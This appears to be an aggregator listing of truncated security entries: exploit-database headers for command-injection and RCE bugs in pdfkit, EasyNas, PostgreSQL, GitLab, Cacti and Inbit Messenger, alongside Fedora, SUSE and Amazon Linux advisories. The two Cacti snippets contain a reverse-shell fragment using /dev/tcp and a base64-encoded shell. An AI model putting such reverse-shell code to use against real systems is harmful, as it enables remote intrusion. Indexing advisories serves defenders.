pdfkit 0.8.7.2 Command Injection

!/usr/bin/env python3 Exploit Title: pdfkit v0.8.7.2 - Command Injection Date: 02/23/2023 Exploit Author: UNICORD NicPWNs & Dev-Yeoj Vendor Homepage: https://pdfkit.org/ Software Link: https://github.com/pdfkit/pdfkit Version: 0.0.0-0.8.7.2 Tested on: pdfkit 0.8.6 CVE: CVE-2022–25765 Source:...

EasyNas 1.1.0 Command Injection

Exploit Title: EasyNas 1.1.0 - OS Command Injection Date: 2023-02-9 Exploit Author: Ivan Spiridonov [email protected] Author Blog: https://xbz0n.medium.com Version: 1.0.0 Vendor home page : https://www.easynas.org Authentication Required: Yes CVE : CVE-2023-0830 !/usr/bin/python3 import...

PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution RCE Authenticated Date: 2023-02-01 Exploit Author: Paulo Trindade @paulotrindadec, Bruno Stabelini @Bruno Stabelini, Diego Farias @fulcrum and Weslley Shaimon Github: https://github.com/paulotrindadec/CVE-2019-9193 Version: PostgreSQL 9.6.1 ...

Amazon Linux 2023 : python3-werkzeug (ALAS2023-2023-149)

It is, therefore, affected by a vulnerability as referenced in the ALAS2023-2023-149 advisory. Werkzeug is a comprehensive WSGI web application library. Browsers may allow nameless cookies that look like =value instead of key=value. A vulnerable browser may allow a compromised application on an...

Exploit for Inadequate Encryption Strength in Argussurveillance Dvr

Argus Surveillance DVR 4.0 - Weak Password Encryption CVE-2...

GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: GitLab v15.3 - Remote Code Execution RCE Authenticated Date: 2022-12-25 Exploit Author: Antonio Francesco Sardella Vendor Homepage: https://about.gitlab.com/ Software Link: https://about.gitlab.com/install/ Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to...

Cacti v1.2.22 - Remote Command Execution Exploit

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

Security fix for the ALT Linux 10 package python3-module-django version 3.2.18-alt1

3.2.18-alt1 built March 31, 2023 Alexey Shabalin in task 317508 March 24, 2023 Alexey Shabalin - New version 3.2.18. - Fixes for the following security vulnerabilities: + CVE-2023-23969 Potential denial-of-service via Accept-Language headers + CVE-2023-24580 Potential denial-of-service...

Fedora: Security Advisory for mingw-python3 (FEDORA-2023-406c1c6ed7)

The remote host is missing an update for the SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Fedora: Security Advisory for mingw-python3 (FEDORA-2023-b3a3df39dd)

The remote host is missing an update for the SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Cacti 1.2.22 Remote Command Execution

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

[SECURITY] Fedora 37 Update: mingw-python3-3.10.10-2.fc37

MinGW Windows python3 library...

[SECURITY] Fedora 36 Update: mingw-python3-3.10.10-2.fc36

MinGW Windows python3 library...

Fedora 36 : mingw-python3 (2023-b3a3df39dd)

The remote Fedora 36 host has a package installed that is affected by a vulnerability as referenced in the FEDORA-2023-b3a3df39dd advisory. Backport fix for CVE-2023-24329. Tenable has extracted the preceding description block directly from the Fedora security advisory. Note that Nessus has not...

Fedora 37 : mingw-python3 (2023-406c1c6ed7)

The remote Fedora 37 host has a package installed that is affected by a vulnerability as referenced in the FEDORA-2023-406c1c6ed7 advisory. Backport fix for CVE-2023-24329. Tenable has extracted the preceding description block directly from the Fedora security advisory. Note that Nessus has not...

Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution Exploit

Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution RCE Exploit Author: a-rey Vendor Homepage: http://www.inbit.com/support.html Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html Version: v4.6.0 - v4.9.0 Tested on: Windows XP SP3, Windows...

SUSE: Security Advisory (SUSE-SU-2023:0663-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

SUSE: Security Advisory (SUSE-SU-2023:0868-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

SUSE: Security Advisory (SUSE-SU-2023:0736-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

ThunderCloud - Cloud Exploit Framework

Cloud Exploit Framework Usage python3 tc.py -h | | | | | / | | | | | | | | | | | | | | | | | | | ' | | | | ' \ / |/ \ '| | | |/ | | | |/ | | | | | | | || | | | | | | / | | || | | || | | | / || ||,|| ||,||| ||/ ,|,| usage: tc.py -h -ce COGNITOENDPOINT -reg REGION -accid AWSACCOUNTID...